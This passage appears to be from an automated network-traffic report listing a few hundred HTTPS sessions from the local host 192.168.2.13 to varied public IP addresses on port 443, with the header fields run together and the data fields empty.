                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19486192.168.2.135464834.85.150.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19487192.168.2.1356676101.99.249.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19488192.168.2.1333978209.45.241.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19489192.168.2.133683298.155.174.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19490192.168.2.1337760196.81.171.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19491192.168.2.135028647.43.129.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19492192.168.2.1340300160.157.0.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19493192.168.2.1354352156.195.123.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19494192.168.2.134641819.219.64.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19495192.168.2.133580658.0.175.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19496192.168.2.1355304130.218.15.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19497192.168.2.1350690162.24.154.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19498192.168.2.134865457.1.59.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19499192.168.2.135242493.76.161.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19500192.168.2.1343842210.12.93.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19501192.168.2.1333934120.38.110.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19502192.168.2.1335234114.71.5.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19503192.168.2.135849434.159.237.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19504192.168.2.1348966152.67.221.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19505192.168.2.1336912203.25.184.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19506192.168.2.134423236.222.93.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19507192.168.2.1358904188.27.29.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19508192.168.2.135650232.209.85.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19509192.168.2.1333654137.108.245.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19510192.168.2.1342016152.97.241.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19511192.168.2.133698252.178.253.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19512192.168.2.1334290213.66.141.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19513192.168.2.1340658180.97.175.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19514192.168.2.1343882146.217.85.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19515192.168.2.1349516185.45.46.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19516192.168.2.1346224201.166.1.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19517192.168.2.1347494201.153.101.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19518192.168.2.1349880196.95.98.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19519192.168.2.13516369.137.232.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19520192.168.2.134130270.214.5.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19521192.168.2.135225683.35.87.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19522192.168.2.1343538165.189.18.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19523192.168.2.1351780211.47.173.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19524192.168.2.1333558173.192.156.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19525192.168.2.1341474166.37.104.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19526192.168.2.1356790199.160.47.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19527192.168.2.134070484.22.205.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19528192.168.2.134799066.83.254.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19529192.168.2.134941673.67.164.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19530192.168.2.1341472208.28.152.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19531192.168.2.13454381.39.181.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19532192.168.2.1351402193.248.172.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19533192.168.2.134748836.68.241.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19534192.168.2.136007632.28.161.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19535192.168.2.1347444129.137.50.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19536192.168.2.133841894.35.248.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19537192.168.2.133949284.159.240.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19538192.168.2.136028497.219.164.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19539192.168.2.1333750112.194.206.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19540192.168.2.134995677.121.181.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19541192.168.2.135329453.222.158.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19542192.168.2.1342226161.90.62.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19543192.168.2.134132839.185.145.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19544192.168.2.133338440.70.83.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19545192.168.2.13330968.79.52.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19546192.168.2.1341978164.238.233.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19547192.168.2.1352082143.52.44.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19548192.168.2.134671661.44.30.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19549192.168.2.1353208111.84.165.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19550192.168.2.135614078.126.105.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19551192.168.2.135413832.23.103.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19552192.168.2.1340712134.159.135.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19553192.168.2.134244278.231.248.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19554192.168.2.1337614105.184.114.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19555192.168.2.13598129.58.254.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19556192.168.2.135563853.35.54.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19557192.168.2.1349344192.162.139.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19558192.168.2.135610043.78.220.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19559192.168.2.133629879.139.98.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19560192.168.2.1333982193.88.59.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19561192.168.2.1339436122.199.29.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19562192.168.2.1358658144.79.77.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19563192.168.2.1345154185.188.86.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19564192.168.2.136075085.90.120.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19565192.168.2.135581298.186.16.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19566192.168.2.134049080.101.239.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19567192.168.2.1360496218.73.73.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19568192.168.2.1351468108.107.252.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19569192.168.2.135974652.132.243.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19570192.168.2.1340158199.182.175.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19571192.168.2.1356096106.150.209.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19572192.168.2.133755872.246.226.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19573192.168.2.1349614181.122.131.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19574192.168.2.1359058120.64.100.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19575192.168.2.1359206105.205.204.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19576192.168.2.135715423.234.55.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19577192.168.2.1343386188.212.127.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19578192.168.2.1333458206.156.64.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19579192.168.2.1333550124.172.11.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19580192.168.2.134476223.217.50.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19581192.168.2.1334972102.22.126.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19582192.168.2.1345834144.12.149.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19583192.168.2.134237042.163.94.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19584192.168.2.1342124205.199.99.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19585192.168.2.135886482.119.44.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19586192.168.2.135002496.19.150.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19587192.168.2.1336796140.42.209.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19588192.168.2.1334884205.254.235.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19589192.168.2.134729446.248.24.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19590192.168.2.1346028178.41.177.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19591192.168.2.1346036178.233.125.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19592192.168.2.1358700194.130.165.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19593192.168.2.135478620.95.87.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19594192.168.2.1355426170.153.151.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19595192.168.2.1343780162.179.113.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19596192.168.2.1334474159.50.212.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19597192.168.2.1338982101.20.166.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19598192.168.2.1340736221.240.61.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19599192.168.2.1356386202.69.29.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19600192.168.2.134675020.101.130.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19601192.168.2.1359570218.165.81.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19602192.168.2.135784274.72.227.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19603192.168.2.1343382140.198.200.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19604192.168.2.134779251.118.206.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19605192.168.2.134388469.19.104.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19606192.168.2.1353730104.180.223.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19607192.168.2.13401942.103.17.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19608192.168.2.1343964139.12.223.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19609192.168.2.1333568191.190.193.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19610192.168.2.1354916110.97.201.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19611192.168.2.1335212136.177.181.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19612192.168.2.1337098122.160.158.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19613192.168.2.1343330155.55.169.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19614192.168.2.1351856222.26.140.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19615192.168.2.135757894.202.59.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19616192.168.2.134488869.66.233.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19617192.168.2.134070689.4.246.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19618192.168.2.1356390182.77.6.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19619192.168.2.134561463.71.201.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19620192.168.2.1337056207.77.114.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19621192.168.2.1346018207.222.26.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19622192.168.2.1351582173.89.195.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19623192.168.2.133736449.84.73.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19624192.168.2.1349994179.185.75.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19625192.168.2.1343724168.207.8.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19626192.168.2.1335796144.95.139.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19627192.168.2.1336170198.70.103.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19628192.168.2.1344040155.233.199.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19629192.168.2.1352874157.70.103.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19630192.168.2.1351316158.213.193.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19631192.168.2.1338654123.164.8.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19632192.168.2.1356462129.206.247.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19633192.168.2.1333532223.212.68.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19634192.168.2.133559672.254.81.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19635192.168.2.1350836132.115.145.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19636192.168.2.1341708153.10.45.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19637192.168.2.1342138139.43.9.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19638192.168.2.1336222171.59.202.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19639192.168.2.1345584199.108.253.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19640192.168.2.135492645.152.220.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19641192.168.2.134625819.8.215.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19642192.168.2.1352504222.54.209.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19643192.168.2.1345426221.116.29.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19644192.168.2.1346326182.17.53.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19645192.168.2.133506867.98.250.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19646192.168.2.1359448146.78.163.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19647192.168.2.134676681.183.225.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19648192.168.2.135848666.144.191.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19649192.168.2.13450502.227.213.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19650192.168.2.1332936168.205.247.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19651192.168.2.133634889.31.212.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19652192.168.2.1335476161.23.199.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19653192.168.2.134949685.219.113.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19654192.168.2.1337824223.83.169.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19655192.168.2.1347782133.228.109.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19656192.168.2.1345172166.40.196.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19657192.168.2.134475098.22.125.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19658192.168.2.1351500187.208.115.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19659192.168.2.133630067.122.40.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19660192.168.2.1343860222.176.76.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19661192.168.2.1351336147.246.241.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19662192.168.2.1346946179.128.245.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19663192.168.2.134199690.214.218.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19664192.168.2.1353702140.146.6.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19665192.168.2.133561423.213.130.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19666192.168.2.134957642.130.221.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19667192.168.2.1341036147.235.49.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19668192.168.2.134559884.254.179.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19669192.168.2.1353698182.108.101.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19670192.168.2.1342884118.48.38.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19671192.168.2.135799664.235.122.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19672192.168.2.134331278.33.142.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19673192.168.2.1336558137.62.182.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19674192.168.2.1343956153.65.213.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19675192.168.2.135821490.181.74.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19676192.168.2.1351140142.196.191.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19677192.168.2.1351478145.161.201.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19678192.168.2.1334272166.99.55.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19679192.168.2.1359380150.95.131.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19680192.168.2.1345092107.103.185.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19681192.168.2.1348938129.222.109.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19682192.168.2.1344540202.228.142.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19683192.168.2.133578867.73.237.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19684192.168.2.1359606184.31.214.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19685192.168.2.1359020182.65.28.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19686192.168.2.135621438.165.146.169443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19687192.168.2.1355164142.23.10.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19688192.168.2.134197285.108.155.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19689192.168.2.1347520117.58.160.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19690192.168.2.1343116184.159.35.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19691192.168.2.135578677.246.96.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19692192.168.2.1341922153.15.63.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19693192.168.2.133446413.122.111.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19694192.168.2.133956460.211.74.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19695192.168.2.1350858126.119.4.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19696192.168.2.1339112200.9.235.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19697192.168.2.1340026201.113.198.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19698192.168.2.1350984192.102.183.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19699192.168.2.135857642.47.161.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19700192.168.2.135281870.205.232.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19701192.168.2.1341218218.218.93.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19702192.168.2.1343346157.7.129.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19703192.168.2.1359136202.221.12.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19704192.168.2.133630271.97.183.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19705192.168.2.1343700200.24.133.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19706192.168.2.1341676193.14.1.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        19707192.168.2.1340668209.102.226.121443
